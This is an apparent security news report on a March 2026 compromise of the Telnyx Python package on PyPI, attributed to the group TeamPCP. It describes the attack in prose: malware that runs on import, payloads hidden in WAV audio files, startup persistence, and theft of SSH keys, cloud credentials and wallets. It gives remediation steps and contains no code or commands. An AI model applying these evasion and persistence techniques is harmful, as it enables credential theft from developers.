A new supply chain attack has been identified in which the threat group TeamPCP compromised the official Telnyx Python package on the Python Package Index (PyPI), distributing malicious versions designed to steal sensitive data. The affected versions, 4.87.1 and 4.87.2, were published on March 27, 2026, and have since been quarantined after the discovery of embedded malware.
The malicious code was inserted into the package’s core file and is triggered automatically when developers import the library into their applications. Unlike typical attacks that rely on installation scripts, this method ensures the malware executes silently during runtime, making it harder to detect. The compromised package targets multiple operating systems, including Windows, Linux, and macOS.
A notable aspect of the attack is the use of audio steganography to conceal the malicious payload. Instead of delivering a conventional executable, the attackers hid the malware within .WAV audio files downloaded from a command-and-control server. These files appear legitimate but contain encoded scripts that extract and execute credential-harvesting programs, enabling attackers to evade standard security detection mechanisms.
On Windows systems, the malware downloads a file named “hangup.wav,” extracts an executable, and places it in the system’s startup directory to ensure persistence across reboots. On Linux and macOS systems, a similar process is used with a different audio file, leading to the execution of a multi-stage attack that collects credentials and exfiltrates them to a remote server in encrypted form.
The credential harvesting component is designed to capture a wide range of sensitive information, including SSH keys, cloud credentials, API tokens, environment variables, and even cryptocurrency wallet data. In some cases, the malware can also exploit cloud services and perform lateral movement within Kubernetes environments, significantly increasing the potential impact of the breach.
Security researchers believe the compromise may be linked to previously stolen publishing credentials, possibly obtained through earlier attacks in the same campaign targeting developer tools and CI/CD pipelines. The incident is part of a broader, ongoing operation by TeamPCP that has affected multiple widely used software packages.
Developers are strongly advised to audit their environments for the affected versions, downgrade to a safe release, rotate all credentials, and block known malicious domains associated with the attack. The incident highlights growing risks in software supply chains, especially as attackers increasingly target widely used open-source components to infiltrate enterprise systems.
